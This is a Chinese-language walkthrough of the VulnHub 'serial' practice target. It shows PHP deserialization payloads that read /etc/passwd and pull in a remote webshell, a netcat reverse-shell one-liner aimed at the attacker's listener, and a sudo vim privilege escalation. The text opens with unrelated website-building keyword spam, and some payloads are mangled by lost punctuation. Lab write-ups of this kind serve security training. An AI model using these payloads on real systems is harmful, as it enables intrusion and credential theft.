外贸网站建站那家公司好,网站建设项目需求说明书,如何在阿里巴巴上做网站,做网站需要视频衔接怎么一.安装靶机
下载地址为https://download.vulnhub.com/serial/serial.zip#xff0c;安装好后开启靶机#xff0c;这里并不需要我们去登录#xff0c;直接扫描虚拟机nat模式下c网段的ip#xff0c;看看哪个的80端口开放#xff0c;然后直接去访问
二.查找cookie
访问靶…一.安装靶机
下载地址为https://download.vulnhub.com/serial/serial.zip安装好后开启靶机这里并不需要我们去登录直接扫描虚拟机nat模式下c网段的ip看看哪个的80端口开放然后直接去访问
二.查找cookie
访问靶机ip后来到这样一个页面按下f12检查打开网络监视器 重新刷新一次页面后会出现两个流量一个访问为200一个为404我们点击200的流量然后查看右边的消息头可以在cookie中找到一串编码 我们将其解码后发现内容为
O:4:User:2:{s:10:Username;s:3:sk4;s:9:Userwel;O:7:Welcome:0:{}}这是一串字符序列其中O代表的是object-项目4则是项目名称字符数量而项目名称则是User2代表项目数量10为第一个项目的字符长度s为类型-string以此类推我们先将其保存起来 三.查询目录
我们利用kali去爆破靶机网站的目录这里可以看到有一个backup目录可以访问 访问后看到一个bak.zip的压缩文件点击可以将其下载 四.代码审计
下载解压得到三个文件里面放着网站的源代码这里就需要代码审计了在index.php中我们可以看到user.class.php它包含了user.class.php文件的代码然后将cookie中的user的值进行base64编码 而user.name.php文件中包含了log.class.php还定义了welcome与user两个类而_construct()与_destruct()两个是序列化中的魔术函数且有参数name所以这里有反序列化漏洞 user.name.php文件还调用了log.class.php文件中的handler函数log.class.php文件中则是定义了一个Log类同时也有costruct函数且handler函数对变量还进行了文件包含和输出 经过代码审计后就可以构造出pyload如下将其放到任意一个php文件中然后访问即可得到序列化经过base64编码后的内容
?phpclass Log {private $type_log /etc/passwd;}class User {private $name admin;private $wel;function __construct() {$this-wel new Log();}
}
$obj new User();
echo base64_encode(serialize($obj));O:4:User:2:{s:10:Username;s:5:admin;s:9:Userwel;O:3:Log:1:{s:13:Logtype_log;s:11:/etc/passwd;}} //序列化Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ //base64编码
五.抓包
我们在靶机网站首页开启抓包然后刷新网页获取到数据包将其发送到重放器后用我们构造的经过序列化和base64编码后的pyload去替换user后的内容然后发送即可得到passwd文件内容 六.获取shell
接下来我们就要获取shell我们可以利用上面的pyload上传一个一句话木马然后去连接。首先我们在自己的web根目录下新建一个3.txt文件内容为?php system($_GET[cmd]);?然后再次构造pyload其中ip为本机ip
?phpclass Log {public $type_log http://192.168.3.133/3.txt;
}
class User {public $name;public $wel;
function __construct($name) {$this-name $name;$this-wel new Log();
}
}
$us new User(sk4);
print_r(serialize($us));
?
将其序列化后进行base64编码
O:4:User:2:{s:4:name;s:3:sk4;s:3:wel;O:3:Log:1:{s:8:type_log;s:26:http://192.168.3.133/3.txt;}}Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjY6Imh0dHA6Ly8xOTIuMTY4LjMuMTMzLzMudHh0Ijt9fQ
然后再次用其替换url后面内容发送即可成功获取shell可以直接添加参数查数据 七.反弹shell
接下来就要反弹shell将参数替换为如下语句其中ip为开启监听的虚拟机可以用虚拟机只要能连接到靶机就行7777则是监听的端口
rm/tmp/f%3bmkfifo/tmp/f%3bcat/tmp/f|/bin/sh-i2%261|nc192.168.154.1287777/tmp/f
发送后即可反弹到shell 其中credentials.txt.bak为敏感文件cat其后即可看到sk4用户的密码得到密码后就可以连接靶机的22端口了 八.提权
首先我们输入sudo -l查看当前用户无法执行的命令发现vim所有用户都可使用那么我们直接输入sudo vim进入编辑模式输入bash即可提权